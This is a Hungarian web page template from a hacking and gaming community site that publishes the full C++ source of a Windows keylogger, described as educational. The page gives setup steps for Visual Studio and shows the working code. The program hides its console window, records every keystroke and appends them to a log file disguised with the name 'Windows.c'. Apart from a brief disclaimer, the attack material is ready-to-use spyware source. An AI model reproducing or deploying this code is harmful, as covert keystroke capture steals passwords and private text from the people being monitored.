<!DOCTYPE html>
<html lang="hu">
<head>
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
    <meta charset="utf-8">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="author" content="Pirate">
    <meta name="copyright" content="© 2021 PRS">
    <meta name="description" content="Pirate Radio Show a website that teaches programing while enjoying the video games.">
    <meta name="keywords" content="hack the box, hackelés, videó játékok, videó játék, video jatek, jatek, videójáték, ingyenesen, ingyen, elérhető, ingyen elérhető, tanulj meg programozni, tanulni programozni, programozás tanulása, tanulás, tanulása, programozni, programozás, fejlesztés, software fejlesztés, tiszta kód, kód, forrás kód, forrás, nyílt forrás, nyílt forrás kód, nyilt forras kod, kod, clean code, clean, pentesztelés, penteszt, pen tesztelés, pen teszt, kiber biztonság, kiberbiztonság, kiber, védelem, kibervédelem, kiber védelem, cyber biztonság, cyber, hackerek, hackelni, anonimitás, programozás, kurzus, képzés, ingyenes, webfejlesztés, web fejlesztés, hackthebox, htb, htba, twitch, steam, epic, games, epicgames, epic games, hack, the, box, hackers, rank, rang, hackersrank, member, members, join, fun, to have fun, have fun, freely, free, fan, social, media, social media, socmedia, soc, socialmedia, htba, cyber, pirates, software, create, write, writing, official, anonymous, c++, c plus plus, c, c#, linux, coding, tutorial, tutorials, course, learn, courses, hacking, ethical, operating, system, systems, gaming, live, livestream, java, pyhton, python3, flask, websites, web, website, mobile application, mobile, phones, phone, app, applicationrust, free games, youtube, twitch, make, money, online, community, freelancer, freelancers, digital, home office, basics of cpp, cpp, g++, basics of coding, basics of programing, computing, free, games, free games, open, source, open source, maths, mathematics, physics, science, fiction, sience fiction, windows, microsoft, visual studio, visual, studio, source code, commands, syntax, compile, set up, install, source, example, examples, security, cyber, cyber security, english, beginner, c++ for beginners, beginners, ctf, CTF, capture the flag, capture flag, coding challenge, challenge, pen test, penetration, pentest, penetration testing, testing, object oriented programming, object, oriented, key logger, keylogger, key, logger, cloud, hackers, cyber hackers, hactivists, hacktivism, steam, steam punks, punks, punk , steam punk, epic games, epic, GeForce Now, Nvidia, nvidia, NVIDIA, NVidia, geforce, geforce now, exercise, exercises, experiment, experiments, bit, coin, coins, BTC, btc, invite, gifts, gift, crypto, currency, eng">
    <meta name="Subject" content="Pentesztelés és kibervédelem! C++ Keylogger forrás kód oktató célokkal!">
    <meta name="expires" content="never" />
    <meta name="viewport" content="width=device-width" initial-scale="1.0">
    <meta name="google-site-verification" content="UMBwmsZQFss_tZhxUd4JMSZglv7_XytJHEbeKGM2b4Q" />
    <meta http-equiv="content-language" content="hu">
    <meta name="content-language" content="hu, hun, hungarian">
    <meta name="Distribution" content="Global">
    <title>Pentesztelés! C++ Keylogger Forrás kód</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='css/style.css')}}">
    <link rel="stylesheet" href="{{ url_for('static', filename='css/style_2.css')}}">
    <link rel="stylesheet" href="{{ url_for('static', filename='css/style_3.css')}}">
    <link rel="stylesheet" href="{{ url_for('static', filename='css/style_4.css')}}">
    <link rel="stylesheet" href="{{ url_for('static', filename='css/market.css')}}">
    <link rel="shortcut icon" href="{{ url_for('static', filename='img/favicon.png')}}">
</head>
<body>
    <header>
        <div class="container">
            <div id="branding">
                <h1><span class="highlight">☠-|Cyber Pirates|-☠</span></h1>
            </div>
            <nav id="services">
                <div class="container">
                    <form>
                        <button formaction="/index">
                            ☠| Kezdőlap |☠
                        </button>
                        <select name="Lang-3" onchange="javascript:handleSelect(this);">
                            <option value="#">
                                Kövess minket bátran:
                            </option>
    
                            <option value="https://www.twitch.tv/cyberpirate98">
                                ☠| Twitch -Pirate- |☠
                            </option>
    
                            <option value="https://www.twitch.tv/VieraGuti">
                                ☠| Twitch VieraGuti|☠
                            </option>
    
                            <option value="https://www.twitch.tv/legozgz">
                                ☠| Twitch -LEGO- |☠
                            </option>
    
                            <option value="https://www.twitch.tv/beyker1965">
                                ☠| Twitch -BEYKER- |☠
                            </option>
    
                            <option value="https://www.youtube.com/channel/UC6JWt6KSex34qH7rpokdTpg">
                                ☠| Youtube -BEYKER- |☠
                            </option>
    
                            <option value="https://www.youtube.com/channel/UCmd2roksoxIvMrE8R8p6u3g">
                                ☠| Youtube -Pirate Code- |☠
                            </option>
    
                            <option value="https://www.facebook.com/Pirata1998">
                                ☠| Facebook -Cyber Pirates- |☠
                            </option>
    
                            <option value="https://twitter.com/cyber_pirate98">
                                ☠| Twitter -Cyber Pirate- |☠
                            </option>
    
                            <option value="https://www.instagram.com/CyberPirate98/">
                                ☠| Instagram -Cyber Pirate- |☠
                            </option>
                        </select>
                        <select name="Lang-3" onchange="javascript:handleSelect(this);">
                            <option value="#">
                                ☠| Chat |☠
                            </option>
                            <option value="https://s.team/chat/FVI1GpWg">
                                ☠| Steam |☠
                            </option>
                            <option value="https://discord.gg/3t82PbymUc">
                                ☠| Discord |☠
                            </option>
                        </select>

                        <select name="Lang-3" onchange="javascript:handleSelect(this);">
                            <option value="#">
                                ☠| Programozáshoz: |☠
                            </option>

                            <option value="/Programozni_HUN">
                                ☠| Tanulj meg programozni |☠
                            </option>

                            <option value="https://github.com/Oscuras98/">
                                ☠| GitHUB |☠
                            </option>
                        </select>


                        <button formaction="Free_JATEKOK_HUN">
                            ☠| Ingyenesen beszerezhető Játékok! |☠
                        </button>

                        <button formaction="/Sponzor_HUN">
                            ☠| Sponzorálás |☠
                        </button>




                        <select name="Lang-3" onchange="javascript:handleSelect(this)">
                            <option value="#">
                                Languages-Lenguaje-Nyelvek
                            </option>

                            <option value="/Pentest_1_ENG">
                                English
                            </option>

                            <option value="/Penetracion_1_ESP">
                                Español
                            </option>
                        </select>
                    </form>
                </div>
            </nav>
        </div>
    </header>

    <section id="newsletter">
        <div class="container">
            <h3><font color="red">Figyelem </font> az alábbi C++ kód oktató célból lett közzé téve!</h3>
            <br />
            <form action="https://picoctf.org/" method="get" target="_blank">
                <button type="submit">Capture The Flag</button>
            </form>
            <form action="https://www.hackthebox.eu/" method="get" target="_blank">
                <button type="submit">Hack The Box</button>
            </form>
        </div>
    </section>

    <section id="main">
        <div class="container">
            <article id="main-col">
                <h3 class="page-title">C++ KeyLogger! Figyelem az alábbi kód oktató célból lett közzé téve!</h3>
                <aside id="sidebar">
                    <div class="stage" style="width: 120px; height: 120px;">
                        <div class="cubespinner">
                            <div class="face1">
                                <center>
                                    <form class="money">
                                        <a href="https://panel.marketagent.com/Register/Account/NewRegistration/en-US?RefUID=3145223 target="_new"><img style="border-style: none; width: 120px; height: 60px" src="http://www.marketagent.com/MA_WebResources/pic/banner/120x60_Marketagent_weiss_US.gif"></a>
                                    </form>
                                </center>
                            </div>
                        </div>
                    </div>
                </aside>
                <ul id="services">
                    <li>
                        <h3>Használata:</h3>
                        <p>Ahhoz hogy hassonló és eredményes kódot tudjunk írni kötelező a fejlesztéshez való szükséges elemek beszerzése: <a href="https://visualstudio.microsoft.com/">Visual Studio Code</a>. Lehetőleg Windows 10-es operációs rendszerű gépre telepítsük mert a Windows.h könyvtár nem minden operációs rendszeren elérhető lásd: MAC, vagy bármely Linux disztribució.</p>
                        <p>Ha már rendelkezésünkre áll egy Win 10-es gép és egy Microsoft Visual Studio Code akkor ne felejtsük feltelepíteni a C++ kód íráshoz szükséges elemeket.</p>
                        <form action="https://visualstudio.microsoft.com/vs/features/cplusplus/">
                            <input type="submit" value="Letöltés" formtarget="_blank" />
                        </form>
                        <p>Ha a fentiekkel meglennénk már csak egy Console Applikációs Projekt-et kell létrehoznunk a C++ nyelv-el beállítva!</p>
                        <p>Miután felgépeltük a Kódot fontos hogy kikapcsoljuk a régi tipusú fügvények használatakor előforduló figyelmeztetéseket!</p>
                        <p>Ezt úgy tehetjük meg hogy kikeressük a projektünk előfeldolgozó menüjét és beírjuk hogy: _CRT_SECURE_NO_WARNINGS;</p>
                    </li>
                </ul>
                <img src="{{ url_for('static', filename='img/HUN/Programozni/C++/KeyLogger/1.png')}}">
                <br />
                <img src="{{ url_for('static', filename='img/HUN/Programozni/C++/KeyLogger/2.png')}}">
                <br />
                <img src="{{ url_for('static', filename='img/HUN/Programozni/C++/KeyLogger/3.png')}}">
                <br />
                <img src="{{ url_for('static', filename='img/HUN/Programozni/C++/KeyLogger/4.png')}}">
                <br />
                <img src="{{ url_for('static', filename='img/HUN/Programozni/C++/KeyLogger/5.png')}}">
                <br />
                <aside id="sidebar">
                    <div class="stage" style="width: 120px; height: 120px;">
                        <div class="cubespinner">
                            <div class="face1">
                                <center>
                                    <form class="money">
                                        <a href="https://panel.marketagent.com/Register/Account/NewRegistration/en-US?RefUID=3145223 target="_new"><img style="border-style: none; width: 120px; height: 60px" src="http://www.marketagent.com/MA_WebResources/pic/banner/120x60_Marketagent_weiss_US.gif"></a>
                                    </form>
                                </center>
                            </div>
                        </div>
                    </div>
                </aside>
                <ul id="services">
                    <li>
                        <h3>Forrás Kód:</h3>
                        <pre class='brush: cpp'>
#include &lt;iostream&gt;
#include &lt;windows.h&gt;
void naplozo(int billentyu_KOD);
int main(int argc, char* argv[])
{
	HWND WINDOW_HANDLER;
	WINDOW_HANDLER = FindWindowA("ConsoleWindowClass", NULL);
	ShowWindow(WINDOW_HANDLER, 0);
	char i;
	while (1)
	{
		// Minden leütött billentyűt megnézünk
		for (i = 8; i <= 190; i++)
		{
			if (GetAsyncKeyState(i) == -32767)	// ka billentyű meg lett nyomva
			{
				naplozo(i);
				if (i == 27)
				{
					ShowWindow(WINDOW_HANDLER, 1);
					return 0;
				}
			}
		}
	}
	return 0;
}
void naplozo(int billentyu_KOD)
{
	// Az egérrel való kattintásokat ignoráljuk
	if ((billentyu_KOD == 1) || (billentyu_KOD == 2)) return;
	printf("%c\n", billentyu_KOD);

	FILE* NAPLOFAJL;
	NAPLOFAJL = fopen("Windows.c", "a+"); // Bármilyen fájl formátum lehet akár .c .txt .java .rust stb...!
	if (billentyu_KOD == 8)
		fprintf(NAPLOFAJL, "%s", "[BACKSPACE]");
	else if (billentyu_KOD == 13)
		fprintf(NAPLOFAJL, "%s", "[ENTER]\n");
	else if (billentyu_KOD == 32)
		fprintf(NAPLOFAJL, "%s", " ");
	else if (billentyu_KOD == VK_ESCAPE)
		fprintf(NAPLOFAJL, "%s", "[ESCAPE]");
	else if (billentyu_KOD == VK_END)
		fprintf(NAPLOFAJL, "%s", "[END]");
	else if (billentyu_KOD == VK_HOME)
		fprintf(NAPLOFAJL, "%s", "[HOME]");
	else if (billentyu_KOD == VK_TAB)
		fprintf(NAPLOFAJL, "%s", "[TAB]");
	else if (billentyu_KOD == VK_CONTROL)
		fprintf(NAPLOFAJL, "%s", "[CONTROL]");
	else if (billentyu_KOD == VK_SHIFT)
		fprintf(NAPLOFAJL, "%s", "[SHIFT]");
	else if (billentyu_KOD == VK_DOWN)
		fprintf(NAPLOFAJL, "%s", "[DOWN ARROW]");
	else if (billentyu_KOD == VK_UP)
		fprintf(NAPLOFAJL, "%s", "[UP ARROW]");
	else if (billentyu_KOD == VK_LEFT)
		fprintf(NAPLOFAJL, "%s", "[LEFT ARROW]");
	else if (billentyu_KOD == VK_RIGHT)
		fprintf(NAPLOFAJL, "%s", "[RIGHT ARROW]");
	else if (billentyu_KOD == 190 || billentyu_KOD == 110)
		fprintf(NAPLOFAJL, "%s", ".");
	else fprintf(NAPLOFAJL, "%s", &billentyu_KOD);
	fclose(NAPLOFAJL);
}

  </pre>
                    </li>
                </ul>
            </article>
        </div>
    </section>

    <footer>
        <div class="container">
            <div id="branding">
                <h2>
                    <font color="green">☠-|Cyber Pirates Hivatalos Oldala|-☠</font> Web fejlesztő: <font color="littleblue">Pirate </font>&copy;
                    2021
                </h2>
            </div>
        </div>
    </footer>
</body>
<script type="text/javascript" src="{{ url_for('static', filename='scripts/main.js')}}"></script>
</html>
